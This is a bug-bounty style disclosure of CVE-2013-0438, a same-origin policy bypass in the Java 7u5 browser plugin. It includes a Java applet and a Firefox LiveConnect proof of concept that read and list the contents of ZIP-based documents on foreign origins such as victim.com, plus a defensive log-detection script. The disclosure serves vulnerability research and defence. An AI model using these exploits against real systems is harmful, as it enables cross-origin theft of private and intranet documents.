CVE-2013-0438, Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes, XSS, Cross Site Scripting

Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes

CVE-2013-0438, Oracle Document

XSS.CX Allowance: $4,000 (Four Thousand US Dollars)

Keywords
Security, Web, Cross-Site Scripting, Private Bug Report, Oracle, Java, JRE, Same-Origin Policy

Summary
A bug in the Oracle Java JRE 7u5 browser plugin allows cross-domain theft of any information encapsulated in a JAR or ZIP file. With the Java browser plugin being used by ~75% of all Internet users[1], this issue affects a total of 1.7B users worldwide[2]. An attacker can access MS Word documents, Excel sheets, Visio data and other ZIP-based files across domains. No user interaction is required to carry out the attack. This document introduces and discusses the vulnerability and provides several Proof-of-Concept (PoC) installations and code examples.
Introduction

Description
The Same Origin Policy installed in modern browsers is based on several components of the origins of two websites attempting communication with each other. Among those are the protocol those websites are using (HTTP, HTTPS or others), the subdomain, domain, top-level domain and in most user agents the port. In case two websites wish to initiate communication, they must share origin – or utilize browser-features such as domain relaxation or Cross-Origin Resource Sharing (CORS). The usual use case for the SOP on the vast majority of websites is delimiting cross origin communication capabilities for the sake of security and privacy.

The Java Runtime Environment nevertheless provides its own interpretation of the SOP and mostly relies on the IP addresses of two HTTP resources to determine whether they may communicate across origins. With Java 6 and earlier versions, cross-origin communication from within a Java applet or LiveConnect code required the browser to load the website via the IPv4 address under which it can be requested. A resource residing on 1.2.3.4 could only request information from other resources residing on 1.2.3.4. Any other communication attempt from unsigned applets or LiveConnect code caused security exceptions to be thrown.

This bug allows bypassing the policy for file types that are ZIP-based. Using the handler for the jar: pseudo-protocol, all files within the browser's reach, including the intranet, are accessible. Because the attack abuses a logical bug in the API's control mechanisms, the exposed Java interfaces that list the files in an archive and read arbitrary entries are comfortably available. The attack is limited to files reachable via HTTP or HTTPS. Since the attack uses Java's environment to access these files, there are a few side effects: Java has its own HTTP interfaces and does not include the user's cookies when used as an applet. It also has its own certificate store, so self-signed SSL certificates that have been white-listed in the browser's certificate store are only white-listed for Java if some other applet or Java application has already done so. Valid SSL certificates pose no obstacle in this scenario.

This attack is much easier to carry out in Firefox: current Firefox versions come with a feature called LiveConnect that allows JavaScript code to use Java APIs without compilation or the use of bytecode Java files as applets. Simple script tags suffice (e.g. <script>x = new java.net.URL(); …</script>).
In this scenario, we are bound to the browser's certificate and cookie store: all outgoing requests can bypass the Same Origin Policy and access foreign files, but they include the known sessions and saved passwords and accept formerly white-listed self-signed certificates.
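As an added example (not part of the report), a server-side heuristic for the applet vector described above: because the plugin fetches the document through Java's own HTTP stack, the request for the ZIP-based file arrives with a Java/<version> User-Agent and without a Referer or the user's browser cookies. The combined log format, the exact User-Agent string and the sample lines are assumptions constructed here.

```python
import re

# Assumption: the web server writes Apache/nginx "combined" format lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Container formats the report names as affected (Office OOXML, OpenDocument, Visio) plus raw archives.
ZIP_BASED_EXTENSIONS = {".docx", ".xlsx", ".pptx", ".vsdx", ".odt", ".ods", ".odp", ".zip", ".jar"}

# Constructed sample lines, not real traffic. Lines two and three mimic the applet vector:
# the Java plugin fetches the document itself, sending its own "Java/<version>" User-Agent
# (assumed string), no Referer and, per the report, none of the browser's cookies.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2013:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
10.0.0.7 - - [10/Jan/2013:10:01:09 +0000] "GET /reports/confidential.odt HTTP/1.1" 200 48211 "-" "Java/1.7.0_05"
10.0.0.7 - - [10/Jan/2013:10:01:10 +0000] "GET /reports/confidential.docx HTTP/1.1" 200 90112 "-" "Java/1.7.0_05"
10.0.0.9 - - [10/Jan/2013:10:02:30 +0000] "GET /reports/confidential.docx HTTP/1.1" 200 90112 "https://intranet.example/reports/" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
10.0.0.7 - - [10/Jan/2013:10:03:00 +0000] "GET /reports/summary.pdf HTTP/1.1" 200 1200 "-" "Java/1.7.0_05"
"""

def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_zip_based(path):
    """True when the requested path (query string stripped) ends in a ZIP-container extension."""
    bare = path.split("?", 1)[0].lower()
    return any(bare.endswith(ext) for ext in ZIP_BASED_EXTENSIONS)

def find_plugin_document_fetches(log_text):
    """Flag successful fetches of ZIP-based documents made directly by the Java HTTP stack.

    Heuristic: User-Agent "Java/..." and an empty Referer ("-"). Only the applet vector looks
    like this; LiveConnect requests ride on the browser's own stack and are not distinguishable here.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["status"] != "200" or not is_zip_based(rec["path"]):
            continue
        if rec["ua"].startswith("Java/") and rec["referer"] == "-":
            hits.append((rec["ip"], rec["path"], rec["ua"]))
    return hits
```

Running find_plugin_document_fetches(SAMPLE_LOG) returns the two .odt/.docx fetches from 10.0.0.7 and ignores the browser-originated download and the PDF.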

PoC Examples
Example 1: Java Applet
This example works in all current browsers that come with Java support. The applet can read arbitrary ZIP files and their content. The target URL assigned to url_b has to be changed accordingly.

import java.awt.*;
import java.applet.Applet;
import java.io.*;
import java.net.*;

public class test2 extends Applet {

    private TextArea ltArea = new TextArea("", 100, 300);

    public void init() {
        add(ltArea);
    }

    public void paint(Graphics g) {
        // Target: a ZIP-based document on a foreign origin, addressed through the jar: handler
        String url_b = "jar:http://victim.com/confidential.odt!/content.xml";
        String content = "";
        try {
            // The jar: URL handler opens the archive and returns the named entry as a stream
            URL u = new URL(url_b);
            BufferedReader ff = new BufferedReader(new InputStreamReader(u.openStream()));
            while (ff.ready()) { content += ff.readLine(); }
        }
        catch (Exception e) { g.drawString("Error", 100, 100); }
        ltArea.setText(content);
    }
}

Example 2: Proof of Concept for Firefox, listing ZIP file index and content of specific file
<pre id='res'>
</pre>
<script>
var resultdiv = document.querySelector("#res");
var url_a = "jar:https://victim.com/confidential.odt!/";
var url_b = "jar:https://victim.com/confidential.odt!/content.xml";
//url_a = "jar:http://victim.com/confidential.docx!/";
//url_b = "jar:http://victim.com/confidential.docx!/word/document.xml";

try {
        // Example 1: List all files in the JAR/ZIP archive via LiveConnect
        resultdiv.textContent += 'Reading JAR and listing files…\n';

        var u = new java.net.URL(url_a);
        var x = u.openConnection();          // JarURLConnection for the jar: URL
        var jarfile = x.getJarFile();
        var iter = jarfile.entries();
        var filelist = [];
        while (iter.hasMoreElements()) {
            var i = iter.nextElement();
            filelist.push(i.getName() + " (" + i.getSize() + " Bytes)");
        }
        resultdiv.textContent += "Files in JAR: \n\t" + filelist.join(',\n\t') + '\n\n';

        // Example 2: Read the content of one file inside the archive
        resultdiv.textContent += 'Reading file content in JAR…\n';

        u = new java.net.URL(url_b);
        var ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream()));
        var content = "";
        while (ff.ready()) { content += ff.readLine(); }
        resultdiv.textContent += "Content of " + url_b + ": \"" + content + "\"\n";
}
catch(e) {
        resultdiv.textContent += e;
        resultdiv.textContent += '\nThis example has been tested with Firefox and Java 7 Update 5';
}
</script>
Listing 2: example2_firefox_only.html

Bug Metrics
Calculated CVSSv2 Score = 4.5

Impact: High – The exploit allows reading arbitrary file types that are based on the ZIP format. This includes documents for Microsoft Office, OpenOffice, AutoCAD and many more. Reading can occur from any HTTP or HTTPS resource accessible to the browser, including its intranet.

Exploitability: High – Stemming from a logical bug in the Java API, exploitability has a very high probability of success. The only requirement is, of course, that the Java browser plugin is installed and working.

________________
[1] StatOWL Java plugin usage in 2012 http://www.statowl.com/java.php
[2] World Internet Usage Stats 2012 http://www.internetworldstats.com/stats.htm